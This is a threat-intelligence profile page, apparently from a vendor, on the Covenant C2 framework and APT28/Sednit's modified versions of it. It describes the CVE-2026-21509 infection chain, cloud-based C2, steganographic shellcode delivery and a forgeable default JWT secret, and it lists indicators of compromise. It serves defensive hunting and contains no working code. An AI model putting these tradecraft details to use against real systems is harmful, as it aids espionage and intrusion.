Covenant
Covenant is an open-source .NET post-exploitation and command-and-control framework first released in February 2019. It is used to establish C2 over HTTP and can use SSL/TLS to encrypt traffic. The framework supports PowerShell-based launchers for Grunt installation, WMI-based installation of new Grunt listeners through XSL files or command one-liners, and in-memory execution of .NET payloads. Reported Grunt capabilities in the provided content include .NET assembly loading, PowerShell execution, output streaming, and encrypted result uploads.
The content links Covenant to both general offensive-security use and multiple real-world malicious operations. It was identified as C2 infrastructure in broader criminal ecosystems, including a server at 62.233.50[.]25 associated with LockBit 3.0 affiliate infrastructure; Shodan and Censys reportedly labeled related Covenant infrastructure on port 7443, with SSL issuer and subject fields containing default values of "Covenant." VirusTotal artifacts tied to that IP included PowerShell scripts and executable payloads labeled as Covenant.
The strongest operational association in the content is with Sednit/APT28/Fancy Bear/Forest Blizzard, a Russian state-sponsored group linked to GRU Unit 26165. ESET reported that from April 2024 onward Sednit reworked Covenant into a primary long-term espionage implant and deployed it together with BeardShell for resilience. Sednit modified Covenant’s execution flow, replaced random implant naming with deterministic identifiers derived from machine characteristics, and added cloud-based communication protocols via the C2Bridge framework. Reported cloud C2 providers used by Sednit’s modified Covenant were pCloud in 2023, Koofr in 2024 and 2025, and Filen from July 2025. ESET observed some monitored machines remaining under surveillance for more than six months. Sednit used Covenant and BeardShell against Ukrainian military personnel, drone manufacturers, and organizations involved in drone research and development, as well as logistics and transportation companies outside Ukraine.
Multiple reports in the content describe APT28 campaigns in 2025 and 2026 using modified Covenant implants delivered through spearphishing. In one infection chain exploiting CVE-2026-21509 in Microsoft Office, malicious documents triggered WebDAV retrieval of payloads, leading to COM hijacking, a scheduled task named OneDriveHealth, deployment of EhStoreShell.dll and SplashScreen.png, extraction of shellcode hidden in PNG files, and in-memory launch of a modified Covenant implant referred to as CovenantGrunt or PrismexStager. This implant used filen.io as command-and-control infrastructure over HTTPS and reportedly implemented components named FilenApi, FilenMessenger, FilenEncryptor, and GruntExecutor, with a handshake using a 2048-bit RSA key pair and an AES-256 session key. Associated post-exploitation activity included reconnaissance with arp.exe, systeminfo.exe, and tracert.exe, process injection into svchost.exe, and preparation for lateral movement.
The content also states that modified Covenant variants used steganography by embedding shellcode in PNG files and extracting it at runtime, and that both BeardShell and Covenant extracted C2 addresses from images stored in cloud services. In Operation Phantom Net Voxel and related reporting, Covenant was described as using Filen, pCloud, and Koofr for C2, with HTTPS and additional ChaCha20-Poly1305 encryption layered on top of TLS in the broader campaign. Reported persistence and delivery mechanisms around these campaigns included spearphishing with weaponized Office documents, VBA macros in some cases, PowerShell execution, Registry Run Keys, COM hijacking, and scheduled-task abuse.
High-confidence indicators directly mentioned in the content include 62.233.50[.]25 as a Covenant C2 server; port 7443 with default SSL subject/issuer values of "Covenant" on related infrastructure; the January 2026 infection artifacts EhStoreShell.dll and SplashScreen.png; the scheduled task OneDriveHealth; malicious delivery domains freefoodaid[.]com, wellnesscaremed[.]com, wellnessmedcare[.]org, and longsauce[.]com; associated IPs 159.253.120.2, 193.187.148.169, and 23.227.202.14; and use of Filen-related infrastructure including filen.io and related domains. Overall, the content portrays Covenant as a legitimate open-source framework that has been repeatedly adapted by threat actors, especially APT28/Sednit, for stealthy, long-term espionage against Ukrainian and European military, government, transport, and defense-related targets.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In January 2026, Sednit also deployed Covenant in a series of spearphishing campaigns exploiting the CVE-2026-21509 vulnerability, as reported by CERT‑UA. | Across 2025 and 2026, Sednit repeatedly deployed BeardShell together with Covenant, a third major piece of its modern toolkit. Sednit heavily reworked this open-source implant to support long-term espionage and to implement a new network protocol based on yet another legitimate cloud provider.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Across 2025 and 2026, Sednit repeatedly deployed BeardShell together with Covenant, a third major piece of its modern toolkit. Sednit heavily reworked this open-source implant to support long-term espionage and to implement a new network protocol based on yet another legitimate cloud provider.
"...execute payloads based on Donut and the Covenant post-exploitation framework."
The attackers also customized the Covenant red-team framework to route encrypted command-and-control traffic through Koofr and Icedrive cloud services, making detection difficult.
In the recent attacks, the Russian threat group paired BeardShell with a heavily modified version of the open-source Covenant .NET post-exploitation framework.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Initial Access
2 techniques
Initial Access
Execution
7 techniques
Execution
The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
...створення запланованої задачі "OneDriveHealth". Заплановане виконання задачі призведе до термінації та повторного запуску процесу explorer.exe...
Silent Cartographer is simply an exercise in identifying the application in play (Covenant), researching any known exploits against it, retooling the published POC, executing the POC, and handling the incoming reverse shell.
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Persistence
1 technique
Persistence
Privilege Escalation
2 techniques
Privilege Escalation
Stealth
2 techniques
Stealth
Стеганография (T1027.003) прячет payload от файлового анализа: PNG с шеллкодом - не исполняемый файл...
Background: Reflection # In .NET, reflection is the runtime feature that lets code discover and use types, methods, and load assemblies dynamically. Legitimate software uses it for plugins, dynamic loading, and tooling - but for attackers it is a defence evasion technique, similar to injection, but for managed code. They can load assemblies straight from bytes in memory, resolve method names on the fly, and execute payloads more discreetly.
Credential Access
1 technique
Credential Access
Covenant versions prior to 0.5 all had the same JWT secret key in default builds. The JWT in Covenant is used to authenticate users to the Covenant web UI... If a user can fabricate a JWT by using the leaked JWT secret key, they can arbitrarily assign themselves admin-level credentials, log in, and wreak havoc on the server.
Discovery
1 technique
Discovery
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Collection
2 techniques
Collection
Command and Control
9 techniques
Command and Control
In addition to being associated with Chang Way, 62.233.50[.]25 is also a Covenant Command and Control (C2) server.
The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."
...в якості інфраструктури для управління COVENANT використовує легітимне хмарне сховище Filen (filen.io).
BeardShell ... leverages the legitimate cloud storage service Icedrive as its C&C channel... Previously, in 2023, Sednit’s Covenant abused the legitimate cloud service pCloud, and in 2024–2025, Koofr ... Figure 11 shows the classes introduced by Sednit developers to communicate with the Filen cloud provider, used since July 2025.
Облачный C2 (Web Service, T1102.002) прячет сетевой трафик... Command and Control - Bidirectional Communication (T1102.002): BEARDSHELL работает через Icedrive API ... COVENANT - через Filen, pCloud, Koofr.
The attackers then upgraded valuable targets to the X-Agent backdoor, often pairing it with the Sedreco loader and the X-Tunnel network pivot.
Cobalt Strike uses a command-line interface to interact with systems. Brute Ratel C4 can use cmd.exe for execution. Havoc can execute commands via cmd.exe. Covenant provides access to a Command Shell in Windows environments for follow-on command execution and tasking.
Exfiltration
3 techniques
Exfiltration
відкриття документу ... призводить до встановлення мережевого з'єднання із зовнішнім ресурсом з використанням протоколу WebDAV, подальшого завантаження файлу із заголовком файлу ярлика
IOCs tracked for this family
66 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
56 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Modified implant/loader used to embed shellcode into PNG files for steganographic delivery, extract it at runtime, recover C2 information from cloud-hosted images, and communicate through Filen, pCloud, and Koofr.
A customized in-memory deployment of the Covenant framework used in Operation Phantom Net Voxel as part of APT28's modern implant chain.
An implant used by Sednit against Ukrainian military personnel and drone-related organizations.
An offensive .NET framework referenced here as the basis for the modified CovenantGrunt implant used for fileless post-exploitation and cloud-based C2.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.